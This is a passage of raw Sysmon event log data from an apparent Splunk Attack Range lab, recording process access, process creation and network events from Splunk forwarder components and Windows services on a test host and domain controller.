Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3270FB3230F6C5E1E1F808976FD74334,SHA256=999291B43BF43EB43AC4C4D5A1A546F9961EC107B8705D54DB012210C15EFDFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:50.494{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse62.80.172.54-56974-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:51.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0118FD03F78E5DB5AE9189E2A48E1DC7,SHA256=B1B7314BEDAD40C2835A37A4B0BE0BDC3F76000CCD66CA3850B379D058967F80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A8-60EB-097D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3A8-60EB-097D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A8-60EB-097D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.761{466BC892-F3A8-60EB-097D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.412{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3727CAF1BE768B799778AA719B0ED0F2,SHA256=FB66C54E8AE9F39B49D3264D44FE72A65B42D86B06AE1F6199A1C8A2C4A0C35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:52.659{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA3587ADE22FA55F9C7B033593FF2E72,SHA256=EF450D869872E4B738411B1A8B7EE1F4F2AAF509984AE6168D52BE0E22C60CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:52.659{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=357FDD3B4763C03C1849EA6F2E953C28,SHA256=EEB9D79DEED58F23C85FCC151DE94A03EB50F62DCEE358D64643E92740CE579B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:52.222{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38A4BD72AB1EDE547A5E0C6D5C8CA0D3,SHA256=E1F62DE68BE2C488E189519DE2C87C9C3851966895878F00FE46192087B400E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.297{466BC892-F3A8-60EB-087D-00000000CF01}101448252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A8-60EB-087D-00000000CF01}10144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3A8-60EB-087D-00000000CF01}10144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.082{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A8-60EB-087D-00000000CF01}10144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.083{466BC892-F3A8-60EB-087D-00000000CF01}10144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001047234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.680{466BC892-F3A9-60EB-0A7D-00000000CF01}88046488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A9-60EB-0A7D-00000000CF01}8804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F3A9-60EB-0A7D-00000000CF01}8804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A9-60EB-0A7D-00000000CF01}8804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 